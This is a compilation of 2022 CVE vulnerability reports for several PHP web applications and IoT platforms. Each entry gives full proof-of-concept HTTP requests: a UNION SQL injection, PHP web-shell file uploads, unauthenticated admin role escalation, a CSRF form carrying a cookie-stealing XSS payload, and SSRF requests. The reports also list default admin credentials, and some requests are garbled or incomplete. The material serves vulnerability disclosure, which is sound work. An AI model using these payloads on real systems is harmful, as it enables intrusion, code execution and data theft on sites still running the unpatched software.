Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_user.php.

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: kingcoues

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/manage\_user.php

Vulnerability location: /sacco\_shield/manage\_user.php?id=, id

dbname = sacco,length=5

\[+\] Payload: /sacco\_shield/manage\_user.php?id=-1%20union%20select%201,2,database(),4,5,6,7,8--+ // Leak place ---> id

GET /sacco\_shield/manage\_user.php?id\=\-1%20union%20select%201,2,database(),4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-41536: bug_report/SQLi-2.md at main · coues/bug_report

Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /admin/users_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Wedding Planner v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author: Li4u

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability url: http://ip/Wedding-Management-PHP/admin/users\_add.php

Loophole location: The Add New User function of "User Management" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "users\_add.php" file.

Click "Edit My Account" to save

Request package for file upload：

POST /Wedding\-Management\-PHP/admin/users\_add.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management-PHP/admin/users\_add.php
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------306421971929630
Content-Length: 1236
\-----------------------------306421971929630
Content-Disposition: form-data; name="submit"
\-----------------------------306421971929630
Content-Disposition: form-data; name="firstname"
1
\-----------------------------306421971929630
Content-Disposition: form-data; name="lastname"
1
\-----------------------------306421971929630
Content-Disposition: form-data; name="email"
1
\-----------------------------306421971929630
Content-Disposition: form-data; name="username"
1
\-----------------------------306421971929630
Content-Disposition: form-data; name="password"
1
\-----------------------------306421971929630
Content-Disposition: form-data; name="password2"
1
\-----------------------------306421971929630
Content-Disposition: form-data; name="gender"
m
\-----------------------------306421971929630
Content-Disposition: form-data; name="address"
1
\-----------------------------306421971929630
Content-Disposition: form-data; name="designation"
0
\-----------------------------306421971929630
Content-Disposition: form-data; name="profile\_picture"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------306421971929630--

The files will be uploaded to this directory \\Wedding-Management-PHP\\admin\\upload\\users 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41539: bug_report/RCE-2.md at main · gougou123-hash/bug_report

Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /Wedding-Management-PHP/admin/photos_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author: Li4u

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability url: http://ip/Wedding-Management-PHP/admin/photos\_add.php

Loophole location: Add function of Upload phpotos module in background management system-- > there is an arbitrary file upload vulnerability (RCE) in the OR Drag Your Images image upload point of photos\_add.php file.

Request package for file upload：

POST /Wedding\-Management\-PHP/admin/photos\_add.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json
Accept\-Language: zh\-CN,zh;q\=0.8,en\-US;q\=0.5,en;q\=0.3
Accept\-Encoding: gzip, deflate
DNT: 1
Cache\-Control: no\-cache
X\-Requested\-With: XMLHttpRequest
Referer: http://192.168.1.19/Wedding\-Management\-PHP/admin/photos\_add.php
Content\-Length: 229
Content\-Type: multipart/form\-data; boundary\=\--\-------------------------203341102920780
Cookie: PHPSESSID\=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

\--\---------------------------203341102920780
Content\-Disposition: form\-data; name\="file"; filename\="shell.php"
Content\-Type: application/octet\-stream

JFJF
<?php phpinfo();?\>
\--\---------------------------203341102920780--

The files will be uploaded to this directory \\Wedding-Management-PHP\\admin\\upload\\gallery 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41538: bug_report/RCE-1.md at main · gougou123-hash/bug_report

Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests.

_CVE-2022-35136: Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests._

_CVE-2022-35135: Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges via a crafted request sent to /api/user/upsert/<uuid>._ 

The platform successfully processes API requests even without valid cookies.For example, the following request to update user profile is processed, even though the request does not have any cookie/api key. (Cookie header is blank in the request) Since API requests to the platform are not authenticated, a user can assign themselves an admin role, by sending a request to http://192.168.72.157/api/user/upsert/<userid> endpoint.

**HTTP Request:**

POST /api/user/upsert/8c34fa03-706a-4dc7-b484-cd8e0c329c81 HTTP/1.1

Host: 192.168.72.157

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0

Accept: \*/\*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/json

X-Requested-With: XMLHttpRequest

Content-Length: 311

Connection: close

Cookie: 

{"domainKey":"FEWYGEJDHT","email":"rohan@rohan.com","firstName":"rohan","lastName":"rohan","primaryPhone":"+1999999999","locale":"en-US","timezone":"GMT","workStart":8,"workEnd":18,"workDays":\[2,3,4,5,6\],"roles":\["admin"\],"registeredStamp":1655919859740,"password":" "}

**HTTP Response:**

HTTP/1.1 200 OK

Server: nginx/1.19.7

Date: Thu, 30 Jun 2022 18:11:22 GMT

Content-Type: application/json

Content-Length: 18

Connection: close

Access-Control-Allow-Origin: \*

Access-Control-Allow-Credentials: true

Access-Control-Allow-Headers: Authorization,Accept,Origin,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Content-Range,Range

Access-Control-Allow-Methods: GET,POST,OPTIONS,PUT,DELETE,PATCH

Host: 192.168.72.157

X-Real-IP: 192.168.72.1

X-Forwarded-For: 192.168.72.1

X-NginX-Proxy: true

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0

Accept: \*/\*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Cookie: 

**{"code":"SUCCESS"}**

CVE-2022-35136: CVE-ID: CVE-2022-35135, CVE-2022-35136

A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows attackers to create and remove dashboards.

A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows attackers to create and remove dashboards. 

The HTTP requests issued by the application do not have anti-csrf tokens. As a result, an attacker can craft a malicious form, which when submitted by an unsuspecting user in a valid session, would make the server assume that the request has been sent willingly by the user.

**Sample PoC form to create a dashboard:**

<html>

  <body>

  <script>history.pushState('', '', '/')</script>

      <input type="hidden" name="name" value="SC&lt;img&#32;src&#61;&#35;&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;" />

      <input type="hidden" name="desc" value="ADV" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

An attacker can use CSRF to inject JavaScript as the dashboard name, granting the attacker access to the victim user's cookie, since the cookie is not marked as HTTPONLY.

Upon submitting the above form, the following request is sent to the server. Note that the origin of the request is not http://localhost:8080, which proves that it is a CSRF request.

**HTTP Request:**

POST /bwiot/api/v1/dashboard/ HTTP/1.1

Host: localhost:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

DNT: 1

Connection: close

Cookie: admin=177a54415aa44802851dcc4c04138c02

Upgrade-Insecure-Requests: 1

name=SC%3Cimg+src%3D%23+onerror%3Dalert%28document.cookie%29%3E&desc=ADV

**HTTP Response:**

HTTP/1.1 200 OK

Date: Fri, 01 Jul 2022 07:58:44 GMT

Server: TornadoServer/3.1

Content-Length: 135

Content-Type: application/json; charset=UTF-8

{"id": 6, "status": "Success", "description": "ADV", "name": "SC<img src=# onerror=alert(document.cookie)\>", "time": 1656662324989.478}

The XSS popup happens as expected, when the admin user visits the dashboard page.

References:

CVE-2022-35611: CVE-ID: CVE-2022-35611

SQL injection vulnerability in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via a crafted POST request to /ResiotQueryDBActive.

**CVE-ID: CVE-2022-34022**

_SQL injection vulnerability in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via a crafted POST request to /ResiotQueryDBActive._

An admin user can execute arbitrary SQL commands and can even dump DB content. Since this endpoint is vulnerable to CSRF, an attacker can abuse CSRF in conjunction with this to execute arbitrary SQL queries on the DB.

**HTTP Request:**

POST /ResiotQueryDBActive/ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0

Accept: \*/\*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 159

Connection: close

Cookie: isMobile=false; login=1; pw=4617e3d2c7ca44273258ee9c706806b6

query=<SQL\_QUERY\_HERE>

References:

CVE-2022-34022: CVE-ID: CVE-2022-34022

Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/createOrder.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: 袁世冲

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/diagnostic/php\_action/createOrder.php

Loophole location: Online Diagnostic Lab Management System's createOrder.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /diagnostic/php\_action/createOrder.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/diagnostic/add-invoice.php
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------291102893527846
Content-Length: 2130
\-----------------------------291102893527846
Content-Disposition: form-data; name="orderDate"
2022-09-21
\-----------------------------291102893527846
Content-Disposition: form-data; name="clientName"
3
\-----------------------------291102893527846
Content-Disposition: form-data; name="clientContact"
7070707070
\-----------------------------291102893527846
Content-Disposition: form-data; name="productName\[\]"
4
\-----------------------------291102893527846
Content-Disposition: form-data; name="rateValue\[\]"
300
\-----------------------------291102893527846
Content-Disposition: form-data; name="quantity\[\]"
1
\-----------------------------291102893527846
Content-Disposition: form-data; name="totalValue\[\]"
300.00
\-----------------------------291102893527846
Content-Disposition: form-data; name="subTotalValue"
300.00
\-----------------------------291102893527846
Content-Disposition: form-data; name="totalAmountValue"
354.00
\-----------------------------291102893527846
Content-Disposition: form-data; name="discount"
1
\-----------------------------291102893527846
Content-Disposition: form-data; name="grandTotalValue"
353.00
\-----------------------------291102893527846
Content-Disposition: form-data; name="gstn"
54.00
\-----------------------------291102893527846
Content-Disposition: form-data; name="vatValue"
54.00
\-----------------------------291102893527846
Content-Disposition: form-data; name="paid"
1
\-----------------------------291102893527846
Content-Disposition: form-data; name="dueValue"
352.00
\-----------------------------291102893527846
Content-Disposition: form-data; name="paymentType"
6
\-----------------------------291102893527846
Content-Disposition: form-data; name="paymentStatus"
2
\-----------------------------291102893527846
Content-Disposition: form-data; name="paymentPlace"
1
\-----------------------------291102893527846
Content-Disposition: form-data; name="productImage"; filename="hack.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------291102893527846--

The files will be uploaded to this directory \\diagnostic\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41534: bug_report/RCE-2.md at main · xuewawa/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: 袁世冲

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/diagnostic/php\_action/editProductImage.php?id=2

Loophole location: Online Diagnostic Lab Management System's editProductImage.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /diagnostic/php\_action/editProductImage.php?id\=2 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/diagnostic/edittest.php?id=2
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------25689655923079
Content-Length: 431
\-----------------------------25689655923079
Content-Disposition: form-data; name="old\_image"
shell.php
\-----------------------------25689655923079
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------25689655923079
Content-Disposition: form-data; name="btn"
\-----------------------------25689655923079--

The files will be uploaded to this directory \\diagnostic\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41533: bug_report/RCE-1.md at main · xuewawa/bug_report

ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the pkg_url parameter at /manager/index.php.

**PoC**

There is a SSRF vulnerability in the pkg\_url parameter of the index.php?a=120 interface in ClipperCMS-clipper\_1.3.3

    manager\actions\package_manager.php
    
    if ((@$_GET['repo'] || $_GET['repo'] === '0') && ctype_digit($_GET['repo']) && $_GET['repo'] < sizeof($repos)) {
    
        $mode = 'repo-list';
        $repo_tag = (isset($_GET['tag']) && ctype_alpha($_GET['tag'])) ? $_GET['tag'] : null;
        $PM_cache_idx = $repo_tag ? $repo_tag : 0;
    
    } elseif ($_SERVER['REQUEST_METHOD'] == 'POST') {
    
        if (@$_POST['pkg_url']) {
    
            $PM = new PackageManager($modx, $_POST['pkg_url']);
            $mode = 'summarise';
    
        } elseif (@$_POST['pkg_folder']) {
    
            $PM = new PackageManager($modx, $_POST['pkg_folder']);
            $mode = 'summarise';
    
        } elseif (isset($_FILES['pkg_file']) && $_FILES['pkg_file']['error'] != UPLOAD_ERR_NO_FILE) {
    
            switch($_FILES['pkg_file']['error']) {
                case UPLOAD_ERR_OK:
                
                    if (is_uploaded_file($_FILES['pkg_file']['tmp_name'])) {
                        $PM = new PackageManager($modx, $_FILES['pkg_file']['tmp_name'], $_FILES['pkg_file']['name']);
                        $mode = 'summarise';
                    } else {
                        $errmsg = $_lang['package_manager_error_internal'];
                    }
                    
                    break;
    
                case UPLOAD_ERR_INI_SIZE:
                    $errmsg = $_lang['package_manager_error_filesize'];
                    break;
    
                default:
                    $errmsg = $_lang['package_manager_error_internal'];
                    break;
        
            }
            ...
    
    

**http://xxxx/manager/index.php?a=120**

    
    POST /manager/index.php?a=120 HTTP/1.1
    Host: 192.168.156.136
    Content-Length: 602
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.156.136
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEJOp0kky1hQLWB2A
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.156.136/manager/index.php?a=120&repo=0
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=51bf76419l_i3_t-1_yZJVXGwCgSQ1XfO4exCxVvHn4s8hU09WAjnkVsBo-0gp1LoJu3_X3RBjw9g_ZEpv5avtlt4MCgPGuzQYz31RXZtB9wWh-Yh5JB6CnhL2HOsg; my_wikiUserID=3; my_wikiUserName=123; 4c707ae227f79bf7de196947377b3e3d=da02mk81p3acuoocm7sp7jk4u2; PHPSESSID=rfkgmjgnf85n1qcc1ii3rsqag6; SN6310b3eaca4dc=ru28c1conkikqpb0k7ualk29u5
    Connection: close
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_url"
    
    http://192.168.156.136:88/111
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_file"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_folder"
    
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="verbose"
    
    0
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="go"
    
    Upload
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A--
    
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao en-ze wang lin-jie wu

CVE-2022-41497: insight/ClipperCMS SSRF.md at master · jayus0821/insight

iCMS v7.0.16 was discovered to contain a Server-Side Request Forgery (SSRF) via the url parameter at admincp.php.

There is a SSRF vulnerability in the url parameter of the admincp.php interface in iCMS-v7.0.16

    app\spider\spider_tools.class.php
    
    public static function remote($url,$ref=null,$_count = 0) {
            if(self::safe_url($url)===false) return false;
    
            (iPHP_SHELL && self::$debug) && print self::datetime()."\033[36mspider_tools::remote\033[0m [".($_count+1)."] => ".$url.PHP_EOL;
    
            $parsed = parse_url($url);
            $url = str_replace('&amp;', '&', $url);
            if(empty(spider::$referer)){
                spider::$referer = $parsed['scheme'] . '://' . $parsed['host'];
            }
    
            $options = array(
                CURLOPT_URL                  => $url,
                CURLOPT_REFERER              => self::$CURLOPT_REFERER?self::$CURLOPT_REFERER:spider::$referer,
                CURLOPT_USERAGENT            => self::$CURLOPT_USERAGENT?self::$CURLOPT_USERAGENT:spider::$useragent,
                CURLOPT_ENCODING             => self::$CURLOPT_ENCODING?self::$CURLOPT_ENCODING:spider::$encoding,
                CURLOPT_TIMEOUT              => self::$CURLOPT_TIMEOUT,
                CURLOPT_CONNECTTIMEOUT       => self::$CURLOPT_CONNECTTIMEOUT,
                CURLOPT_RETURNTRANSFER       => 1,
                CURLOPT_FAILONERROR          => 0,
                CURLOPT_HEADER               => 0,
                CURLOPT_NOSIGNAL             => true,
                // CURLOPT_DNS_USE_GLOBAL_CACHE => true,
                // CURLOPT_DNS_CACHE_TIMEOUT    => 86400,
                CURLOPT_SSL_VERIFYPEER       => false,
                CURLOPT_SSL_VERIFYHOST       => false
                // CURLOPT_FOLLOWLOCATION => 1,// 使用自动跳转
                // CURLOPT_MAXREDIRS => 7,//查找次数，防止查找太深
            );
            ...
    

    GET c HTTP/1.1
    Host: 192.168.156.136:88
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=b5e13749p_MURGBi7YR3-HetWrkTTKq1pTW78-1apE9T74fye8D9Ticl-PqpZ5raVcOeex3BRI6jYetvGYFegWP00Gv1a4Q2a_RIxQi81T1HtLgYm00OzJzHEb-pVQ
    Connection: close

Tag

#windows